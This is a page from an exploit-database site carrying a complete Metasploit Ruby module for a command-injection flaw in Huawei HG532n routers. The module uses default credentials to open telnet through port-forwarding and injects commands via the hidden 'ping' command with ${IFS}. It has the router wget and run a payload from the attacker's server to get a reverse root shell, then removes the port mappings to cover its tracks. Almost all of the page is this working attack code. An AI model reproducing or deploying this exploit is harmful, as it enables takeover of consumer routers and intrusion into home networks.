0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Huawei HG532n Command Injection Exploit
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'base64' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE def initialize(info = {}) super(update_info( info, 'Name' => 'Huawei HG532n Command Injection', 'Description' => %q( This module exploits a command injection vulnerability in the Huawei HG532n routers provided by TE-Data Egypt, leading to a root shell. The router's web interface has two kinds of logins, a "limited" user:user login given to all customers and an admin mode. The limited mode is used here to expose the router's telnet port to the outside world through NAT port-forwarding. With telnet now remotely accessible, the router's limited "ATP command line tool" (served over telnet) can be upgraded to a root shell through an injection into the ATP's hidden "ping" command. ), 'Author' => [ 'Ahmed S. Darwish <darwish.07@gmail.com>', # Vulnerability discovery, msf module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/mettle_reverse_tcp' }, 'Targets' => [ [ 'Linux mipsbe Payload', { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 15 2017' )) register_options( [ OptString.new('HttpUsername', [false, 'Valid web-interface user-mode username', 'user']), OptString.new('HttpPassword', [false, 'Web-interface username password', 'user']), OptString.new('TelnetUsername', [false, 'Valid router telnet username', 'admin']), OptString.new('TelnetPassword', [false, 'Telnet username password', 'admin']), OptAddress.new('DOWNHOST', [false, 'Alternative host to request the MIPS payload from']), OptString.new('DOWNFILE', [false, 'Filename to download, (default: random)']), OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit to connect back", 60]) ], self.class ) end def check httpd_fingerprint = %r{ \A HTTP\/1\.1\s200\sOK\r\n CACHE-CONTROL:\sno-cache\r\n Date:\s.*\r\n Connection:\sKeep-Alive\r\n Content-Type:\stext\/html\r\n Content-Length:\s\d+\r\n \r\n <html>\n<head>\n <META\shttp-equiv="Content-Type"\scontent="text\/html;\scharset=UTF-8">\r\n <META\shttp-equiv="Pragma"\scontent="no-cache">\n <META\shttp-equiv="expires"\sCONTENT="-1">\n <link\srel="icon"\stype="image\/icon"\shref="\/favicon.ico"\/> }x begin res = send_request_raw( 'method' => 'GET', 'uri' => '/' ) rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} - Could not connect to device") return Exploit::CheckCode::Unknown end if res && res.code == 200 && res.to_s =~ httpd_fingerprint return Exploit::CheckCode::Appears end Exploit::CheckCode::Unknown end # # The Javascript code sends all passwords in the form: # form.setAction('/index/login.cgi'); # form.addParameter('Username', Username.value); # form.addParameter('Password', base64encode(SHA256(Password.value))); # Do the same base64 encoding and SHA-256 hashing here. # def hash_password(password) sha256 = OpenSSL::Digest::SHA256.hexdigest(password) Base64.encode64(sha256).gsub(/\s+/, "") end # # Without below cookies, which are also sent by the JS code, the # server will consider even correct HTTP requests invalid # def generate_web_cookie(admin: false, session: nil) if admin cookie = 'FirstMenu=Admin_0; ' cookie << 'SecondMenu=Admin_0_0; ' cookie << 'ThirdMenu=Admin_0_0_0; ' else cookie = 'FirstMenu=User_2; ' cookie << 'SecondMenu=User_2_1; ' cookie << 'ThirdMenu=User_2_1_0; ' end cookie << 'Language=en' cookie << "; #{session}" unless session.nil? cookie end # # Login to the router through its JS-based login page. Upon a successful # login, return the keep-alive HTTP session cookie # def web_login cookie = generate_web_cookie(admin: true) # On good passwords, the router redirect us to the /html/content.asp # homepage. Otherwise, it throws us back to the '/' login page. Thus # consider the ASP page our valid login marker invalid_login_marker = "var pageName = '/'" valid_login_marker = "var pageName = '/html/content.asp'" username = datastore['HttpUsername'] password = datastore['HttpPassword'] res = send_request_cgi( 'method' => 'POST', 'uri' => '/index/login.cgi', 'cookie' => cookie, 'vars_post' => { 'Username' => username, 'Password' => hash_password(password) } ) fail_with(Failure::Unreachable, "Connection timed out") if res.nil? unless res.code == 200 fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}") end return res.get_cookies if res.body.include? valid_login_marker if res.body.include? invalid_login_marker fail_with(Failure::NoAccess, "Invalid web interface credentials #{username}:#{password}") else fail_with(Failure::UnexpectedReply, "Neither valid or invalid login markers received") end end # # The telnet port is filtered by default. Expose it to the outside world # through NAT forwarding # def expose_telnet_port(session_cookies) cookie = generate_web_cookie(session: session_cookies) external_telnet_port = rand(32767) + 32768 portmapping_page = '/html/application/portmapping.asp' valid_port_export_marker = "var pageName = '#{portmapping_page}';" invalid_port_export_marker = /var ErrInfo = \d+/ res = send_request_cgi( 'method' => 'POST', 'uri' => '/html/application/addcfg.cgi', 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}#{portmapping_page}" }, 'vars_get' => { 'x' => 'InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping', 'RequestFile' => portmapping_page }, 'vars_post' => { 'x.PortMappingProtocol' => "TCP", 'x.PortMappingEnabled' => "1", 'x.RemoteHost' => "", 'x.ExternalPort' => external_telnet_port.to_s, 'x.ExternalPortEndRange' => external_telnet_port.to_s, 'x.InternalClient' => "192.168.1.1", 'x.InternalPort' => "23", 'x.PortMappingDescription' => Rex::Text.rand_text_alpha(10) # Minimize any possible conflict } ) fail_with(Failure::Unreachable, "Connection timed out") if res.nil? unless res.code == 200 fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}") end if res.body.include? valid_port_export_marker print_good "Telnet port forwarding succeeded; exposed telnet port = #{external_telnet_port}" return external_telnet_port end if res.body.match? invalid_port_export_marker fail_with(Failure::Unknown, "Router reported port-mapping error. " \ "A port-forwarding entry with same external port (#{external_telnet_port}) already exist?") end fail_with(Failure::UnexpectedReply, "Port-forwarding failed: neither valid or invalid markers received") end # # Cover our tracks; don't leave the exposed router's telnet port open # def hide_exposed_telnet_port(session_cookies) cookie = generate_web_cookie(session: session_cookies) portmapping_page = '/html/application/portmapping.asp' # Gather a list of all existing ports forwarded so we can purge them soon res = send_request_cgi( 'method' => 'GET', 'uri' => portmapping_page, 'cookie' => cookie ) unless res && res.code == 200 print_warning "Could not get current forwarded ports from web interface" end # Collect existing port-forwarding keys; to be passed to the delete POST request portforward_key = /InternetGatewayDevice\.WANDevice\.1\.WANConnectionDevice\.1\.WANPPPConnection\.1\.PortMapping\.\d+/ vars_post = {} res.body.scan(portforward_key).uniq.each do |key| vars_post[key] = "" end res = send_request_cgi( 'method' => 'POST', 'uri' => '/html/application/del.cgi', 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}#{portmapping_page}" }, 'vars_get' => { 'RequestFile' => portmapping_page }, 'vars_post' => vars_post ) return if res && res.code == 200 print_warning "Could not re-hide exposed telnet port" end # # Cleanup our state, after any successful web login. Note: router refuses # more than 3 concurrent logins from the same IP. It also forces a 1-minute # delay after 3 unsuccessful logins from _any_ IP. # def web_logout(session_cookies) cookie = generate_web_cookie(admin: true, session: session_cookies) res = send_request_cgi( 'method' => 'POST', 'uri' => '/index/logout.cgi', 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}/html/main/logo.html" } ) return if res && res.code == 200 print_warning "Could not logout from web interface. Future web logins may fail!" end # # Don't leave web sessions idle for too long (> 1 second). It triggers the # HTTP server's safety mechanisms and make it refuse further operations. # # Thus do all desired web operations in chunks: log in, do our stuff (passed # block), and immediately log out. The router's own javescript code handles # this by sending a refresh request every second. # def web_operation begin cookie = web_login yield cookie ensure web_logout(cookie) unless cookie.nil? end end # # Helper method. Used for waiting on telnet banners and prompts. # Always catch the ::Timeout::Error exception upon calling this. # def read_until(sock, timeout, marker) received = '' Timeout.timeout(timeout) do loop do r = (sock.get_once(-1, 1) || '') next if r.empty? received << r print_status "Received new reply token = '#{r.strip}'" if datastore['VERBOSE'] == true return received if received.include? marker end end end # # Borrowing constants from Ruby's Net::Telnet class (ruby license) # IAC = 255.chr # "\377" # "\xff" # interpret as command DO = 253.chr # "\375" # "\xfd" # please, you use option OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission OPT_ECHO = 1.chr # "\001" # "\x01" # Echo OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition def telnet_auth_negotiation(sock, timeout) begin read_until(sock, timeout, 'Password:') sock.write(IAC + DO + OPT_ECHO + IAC + DO + OPT_SGA) rescue ::Timeout::Error fail_with(Failure::UnexpectedReply, "Expected first password banner not received") end begin read_until(sock, timeout, 'Password:') # Router bug sock.write(datastore['TelnetPassword'] + OPT_NAOFFD + OPT_BINARY) rescue ::Timeout::Error fail_with(Failure::UnexpectedReply, "Expected second password banner not received") end end def telnet_prompt_wait(error_regex = nil) begin result = read_until(@telnet_sock, @telnet_timeout, @telnet_prompt) if error_regex error_regex = [error_regex] unless error_regex.is_a? Array error_regex.each do |regex| if result.match? regex fail_with(Failure::UnexpectedReply, "Error expression #{regex} included in reply") end end end rescue ::Timeout::Error fail_with(Failure::UnexpectedReply, "Expected telnet prompt '#{@telnet_prompt}' not received") end end # # Basic telnet login. Due to mixins conflict, revert to using plain # Rex sockets (thanks @hdm!) # def telnet_login(port) print_status "Connecting to just-exposed telnet port #{port}" @telnet_prompt = 'HG520b>' @telnet_timeout = 60 @telnet_sock = Rex::Socket.create_tcp( 'PeerHost' => rhost, 'PeerPort' => port, 'Context' => { 'Msf' => framework, 'MsfExploit' => self }, 'Timeout' => @telnet_timeout ) if @telnet_sock.nil? fail_with(Failure::Unreachable, "Exposed telnet port unreachable") end add_socket(@telnet_sock) print_good "Connection succeeded. Passing telnet credentials" telnet_auth_negotiation(@telnet_sock, @telnet_timeout) print_good "Credentials passed; waiting for prompt '#{@telnet_prompt}'" telnet_prompt_wait print_good 'Prompt received. Telnet access fully granted!' end def telnet_exit return if @telnet_sock.nil? @telnet_sock.write('exit' + OPT_NAOFFD + OPT_BINARY) end # # Router's limited ATP shell just reverts to classical Linux # shell when executing a ping: # # "ping %s > /var/res_ping" # # A successful injection would thus substitute all its spaces to # ${IFS}, and trails itself with ";true" so it can have its own # IO redirection. # def execute_command(command, error_regex = nil, background: false) print_status "Running command on target: #{command}" command.gsub!(/\s/, '${IFS}') separator = background ? '&' : ';' atp_cmd = "ping ?;#{command}#{separator}true" @telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY) telnet_prompt_wait(error_regex) print_good "Command executed successfully" end # # Our own HTTP server, for serving the payload # def start_http_server @pl = generate_payload_exe downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8)) resource_uri = '/' + downfile if datastore['DOWNHOST'] print_status "Will not start local web server, as DOWNHOST is already defined" else print_status("Starting web server; hosting #{resource_uri}") start_service( 'ServerHost' => '0.0.0.0', 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri } ) end resource_uri end # # HTTP server incoming request callback # def on_request_uri(cli, _request) print_good "HTTP server received request. Sending payload to victim" send_response(cli, @pl) end # # Unfortunately we could not use the `echo' command stager since # the router's busybox echo does not understand the necessary # "-en" options. It outputs them to the binary instead. # # We could not also use the `wget' command stager, as Huawei # crafted their own implementation with much different params. # def download_and_run_payload(payload_uri) srv_host = if datastore['DOWNHOST'] datastore['DOWNHOST'] elsif datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::" Rex::Socket.source_address(rhost) else datastore['SRVHOST'] end srv_port = datastore['SRVPORT'].to_s output_file = "/tmp/#{rand_text_alpha_lower(8)}" # Check module documentation for the special wget syntax wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}" execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc. execute_command("chmod 700 #{output_file}", /No such file/) execute_command(output_file, /not found/, background: true) execute_command("rm #{output_file}", /No such file/) end # # At the end of the module, especially for reverse_tcp payloads, wait for # the payload to connect back to us. There's a very high probability we # will lose the payload's signal otherwise. # def wait_for_payload_session print_status "Waiting for the payload to connect back .." begin Timeout.timeout(datastore['ListenerTimeout']) do loop do break if session_created? Rex.sleep(0.25) end end rescue ::Timeout::Error fail_with(Failure::Unknown, "Timeout waiting for payload to start/connect-back") end print_good "Payload connected!" end # # Main exploit code: login through web interface; port-forward router's # telnet; access telnet and gain root shell through command injection. # def exploit print_status "Validating router's HTTP server (#{rhost}:#{rport}) signature" unless check == Exploit::CheckCode::Appears fail_with(Failure::Unknown, "Unable to validate device fingerprint. Is it an HG532n?") end print_good "Good. Router seems to be a vulnerable HG532n device" telnet_port = nil web_operation do |cookie| telnet_port = expose_telnet_port(cookie) end begin telnet_login(telnet_port) payload_uri = start_http_server download_and_run_payload(payload_uri) wait_for_payload_session ensure telnet_exit web_operation do |cookie| hide_exposed_telnet_port(cookie) end end end end # 0day.today [2024-12-25] #